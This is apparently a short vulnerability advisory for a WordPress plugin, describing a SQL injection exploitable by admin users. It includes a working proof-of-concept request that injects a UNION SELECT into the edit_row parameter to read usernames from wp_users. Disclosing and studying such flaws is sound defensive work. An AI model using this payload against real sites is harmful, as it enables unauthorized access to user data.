The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privileged users such as admin.

Proof of Concept

GET /wp-admin/admin.php?page=wpcc_add_new&edit_row=-1+UNION+select+1,1,1,1,user_login,1,1,1,1,1,1,1,1,1,1,1+from+wp_users HTTP/1.1
Host: localhost

Select “Text Cursor”, and the user’s name will be in the input field.